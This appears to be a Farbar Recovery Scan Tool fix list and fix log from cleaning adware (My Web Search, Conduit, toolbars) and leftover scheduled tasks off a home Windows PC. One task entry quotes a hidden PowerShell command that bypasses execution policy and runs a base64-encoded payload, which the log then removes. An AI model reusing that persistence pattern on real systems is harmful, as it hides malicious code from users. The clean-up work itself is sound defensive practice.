2011-09-28 21:30 - 2011-09-28 21:30 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe
2012-01-20 11:14 - 2012-01-20 11:14 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe
2011-09-10 09:35 - 2011-09-10 09:35 - 0075456 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe
2011-08-23 22:07 - 2011-08-23 22:07 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe
2011-10-11 17:07 - 2011-10-11 17:07 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe
2011-08-24 08:46 - 2011-08-24 08:46 - 0075456 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe
2011-11-26 23:50 - 2011-11-26 23:50 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe
2011-11-28 06:12 - 2011-11-28 06:12 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe
2011-10-13 15:47 - 2011-10-13 15:47 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe
2011-11-29 23:40 - 2011-11-29 23:40 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe
2011-11-30 23:09 - 2011-11-30 23:09 - 0091712 _____ (MyWebSearch.com) C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe
2012-01-08 22:18 - 2012-01-08 22:18 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe
2012-01-11 01:03 - 2012-01-11 01:03 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe
2011-12-03 12:09 - 2011-12-03 12:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe
2011-12-05 16:58 - 2011-12-05 16:58 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe
2011-12-06 19:09 - 2011-12-06 19:09 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe
2011-12-14 21:46 - 2011-12-14 21:46 - 0091712 _____ () C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe
2010-09-04 17:23 - 2010-10-02 09:49 - 0000000 _____ () C:\Users\Lexi\AppData\Local\Okaducenafi.bin
2010-09-04 17:23 - 2010-10-02 15:59 - 0000120 _____ () C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat
2014-08-29 14:20 - 2014-08-29 14:20 - 0000000 _____ () C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509}
2011-01-22 13:59 - 2011-01-22 13:59 - 0000056 ____H () C:\ProgramData\ezsidmv.dat
C:\Users\Lexi\FileThisDesktopInstaller.exe
CustomCLSID: HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Lexi\AppData\Roaming\Dropbox\bin\Dropbox.exe /autoplay => No File
Task: {0055D0AD-03B3-4D48-AFE3-A38C8C677968} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {019548C8-5866-4E43-947E-549EFB0E5BF0} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
ask: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {3455E5EB-982F-4F37-A08F-2611B97362E4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {4874B179-27CF-4EF3-B6D5-9B73AC212125} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {62ECE67D-6CE1-4F21-8A41-AF981AFA9D32} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {8A8E57B1-1E98-4427-9E6A-C1300BA645D8} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {8E429196-FD32-44C9-A7D4-1F6A6049AEAA} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {901656D9-4A6A-484C-8071-772FE3370625} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {DA52D331-0D67-4E23-8587-EBA2B65F4A46} - System32\Tasks\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9440 more characters).
AlternateDataStreams: C:\ProgramData\TEMP:443E07A5 [118]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\be you.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\beyoubravely.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - back.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\BusinessCardShell - Front.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\feather.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler woordle.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\Lexi\Documents\Guethler.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
CMD: ipconfig /flushdns
EmptyTemp:
CMD: ipconfig /flushdns
EmptyTemp:
end
 
 
 
*****************
 
Restore point was successfully created.
Processes closed successfully.
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\NoSetActiveDesktop => value removed successfully
KU\S-1-5-21-2574262253-2623044021-4024016403-1001\...\Policies\Explorer: [NoSetActiveDesktop] 0 => Error: No automatic fix found for this entry.
"C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC64Loader.dll" => Value data removed successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt1" => key removed successfully
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt2" => key removed successfully
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt3" => key removed successfully
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => key not found.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\DropboxExt4" => key removed successfully
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => key not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\URLSearchHooks\\{8bdea9d6-6f62-45eb-8ee9-8a81af0d2f94} => value removed successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => key removed successfully
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0}" => key removed successfully
HKCR\Wow6432Node\CLSID\{56256A51-B582-467e-B8D4-7786EDA79AE0} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9}" => key removed successfully
HKCR\CLSID\{014DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2EDC592E-BE3B-45E6-9A09-3818FD7629D6}" => key removed successfully
HKCR\CLSID\{2EDC592E-BE3B-45E6-9A09-3818FD7629D6} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2f23ab71-4ac6-41f2-a955-ea576e553146}" => key removed successfully
HKCR\CLSID\{2f23ab71-4ac6-41f2-a955-ea576e553146} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{56256A51-B582-467e-B8D4-7786EDA79AE0}" => key removed successfully
HKCR\CLSID\{56256A51-B582-467e-B8D4-7786EDA79AE0} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{60C66211-88F6-486E-8303-B0B10E4FD293}" => key removed successfully
HKCR\CLSID\{60C66211-88F6-486E-8303-B0B10E4FD293} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4}" => key removed successfully
HKCR\CLSID\{AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} => key not found.
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{B1243C39-DE64-4E02-BC80-265B7BD496B1}" => key removed successfully
HKCR\CLSID\{B1243C39-DE64-4E02-BC80-265B7BD496B1} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9D425283-D487-4337-BAB6-AB8354A81457}" => key removed successfully
HKCR\Wow6432Node\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{F5580E24-8416-4DFD-90B3-078D4EDF4FCB}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{A8C7C2CA-6DFD-4E16-8458-592361564D38} => value removed successfully
"HKCR\Wow6432Node\CLSID\{A8C7C2CA-6DFD-4E16-8458-592361564D38}" => key removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{9D425283-D487-4337-BAB6-AB8354A81457} => value removed successfully
HKCR\Wow6432Node\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Toolbar\\{62cad681-699f-4f83-b87f-95584003592f} => value removed successfully
"HKCR\Wow6432Node\CLSID\{62cad681-699f-4f83-b87f-95584003592f}" => key removed successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{9D425283-D487-4337-BAB6-AB8354A81457} => value removed successfully
HKCR\CLSID\{9D425283-D487-4337-BAB6-AB8354A81457} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} => value removed successfully
HKCR\CLSID\{8BDEA9D6-6F62-45EB-8EE9-8A81AF0D2F94} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{62CAD681-699F-4F83-B87F-95584003592F} => value removed successfully
HKCR\CLSID\{62CAD681-699F-4F83-B87F-95584003592F} => key not found.
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\\{A13C2648-91D4-4BF3-BC6D-0079707C4389} => value removed successfully
"HKCR\CLSID\{A13C2648-91D4-4BF3-BC6D-0079707C4389}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{2FF8D282-F78A-4A33-ABC2-49E72A341482}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{2FF8D282-F78A-4A33-ABC2-49E72A341482}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Code Store Database\Distribution Units\{C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{C7DEDA04-2FFF-4B81-AE66-0A0E0EF4AD2F}" => key removed successfully
Firefox "homepage" removed successfully
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\extension@Fast_Free_Converter.com => value removed successfully
C:\Program Files (x86)\Fast Free Converter\FastFreeConverter\extension@Fast_Free_Converter.com => moved successfully
HKU\S-1-5-21-2574262253-2623044021-4024016403-1001\Software\Mozilla\Firefox\Extensions\\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} => value removed successfully
C:\Users\Lexi\AppData\Local\{91AEF2CA-157A-4EB0-9775-9AEB4CF8B382} => moved successfully
idsvc => service removed successfully
wfpcapture => service removed successfully
wpcsvc => service removed successfully
C:\Users\Lexi\AppData\LocalLow\FunWebProducts => moved successfully
C:\Users\Lexi\AppData\LocalLow\Conduit => moved successfully
C:\Users\Lexi\AppData\Local\Conduit => moved successfully
C:\Program Files (x86)\Conduit => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00024cb8).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000321b2).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00034114).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0003ec41).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00056cd5).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00073fec).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0008252c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0008496e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000b8b3e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(000c73a9).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00130f9a).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0018976e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00288d51).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(008db6d3).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(00fc1d83).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(013e5cf4).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(01fc745e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(026211c7).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0431a317).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(04456972).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(054287ef).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(05af0912).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0827ae62).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0a233f94).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(0cc139e7).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(106fb87b).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(134e6ebe).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(13f4b968).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1462a399).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1475ab09).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(14c57403).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(191ae0ef).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1bd14184).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1e0d189c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(1fa4da4d).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(2138ca7d).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(23633e70).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(241d11a9).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(2dc97e34).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(3641cf4c).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(365b465f).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(386da867).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(38a4d5bf).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(38da5692).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(3f5e903a).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(42715212).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(48441ffa).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(4d4e5d71).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(4eaa8c83).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(598e1f87).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(5a656a9f).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(65babd0e).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(6b589e26).exe => moved successfully
C:\Users\Lexi\AppData\Local\My Web Search Installer(951b3e56).exe => moved successfully
C:\Users\Lexi\AppData\Local\Okaducenafi.bin => moved successfully
C:\Users\Lexi\AppData\Local\Vvoqitamewiga.dat => moved successfully
C:\Users\Lexi\AppData\Local\{56FEC2D8-8D9A-4EBB-8F41-2EA297B30509} => moved successfully
C:\ProgramData\ezsidmv.dat => moved successfully
C:\Users\Lexi\FileThisDesktopInstaller.exe => moved successfully
"HKU\S-1-5-21-2574262253-2623044021-4024016403-1001_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0055D0AD-03B3-4D48-AFE3-A38C8C677968}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0055D0AD-03B3-4D48-AFE3-A38C8C677968}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{019548C8-5866-4E43-947E-549EFB0E5BF0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{019548C8-5866-4E43-947E-549EFB0E5BF0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
ask: {31BD4F86-0AC8-44F3-8311-6D5F6E437CE8} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION => Error: No automatic fix found for this entry.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3455E5EB-982F-4F37-A08F-2611B97362E4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3455E5EB-982F-4F37-A08F-2611B97362E4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4874B179-27CF-4EF3-B6D5-9B73AC212125}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4874B179-27CF-4EF3-B6D5-9B73AC212125}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62ECE67D-6CE1-4F21-8A41-AF981AFA9D32}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62ECE67D-6CE1-4F21-8A41-AF981AFA9D32}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8A8E57B1-1E98-4427-9E6A-C1300BA645D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8A8E57B1-1E98-4427-9E6A-C1300BA645D8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8D5BFBF8-B310-4BAC-AFAE-AB69A8B5B6B2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8E429196-FD32-44C9-A7D4-1F6A6049AEAA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8E429196-FD32-44C9-A7D4-1F6A6049AEAA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{901656D9-4A6A-484C-8071-772FE3370625}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{901656D9-4A6A-484C-8071-772FE3370625}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BFB2B30C-9AA7-4CF9-9102-4905A8D13BBF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DA52D331-0D67-4E23-8587-EBA2B65F4A46}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DA52D331-0D67-4E23-8587-EBA2B65F4A46}" => key removed successfully
C:\WINDOWS\System32\Tasks\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7E7D0F47-0A78-0E0A-7A11-047E0C7E1178}" => key removed successfully
C:\ProgramData\TEMP => ":443E07A5" ADS removed successfully.
"C:\Users\Lexi\Documents\be you.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\be you.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\be you.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\beyoubravely.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\beyoubravely.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\beyoubravely.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg" => ":Updt_SummaryInformation" ADS not found.
C:\Users\Lexi\Documents\BusinessCardShell  back2.jpg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully.
"C:\Users\Lexi\Documents\BusinessCardShell - back.jpg" => ":SummaryInformation" ADS not found.
"C:\Users\Lexi\Documents\BusinessCardShell - back.jpg" => ":Updt_SummaryInformation" ADS not found.
